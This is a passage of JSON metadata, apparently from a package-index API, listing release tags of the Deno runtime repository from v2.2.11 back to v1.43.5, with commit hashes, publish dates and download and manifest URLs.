anifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/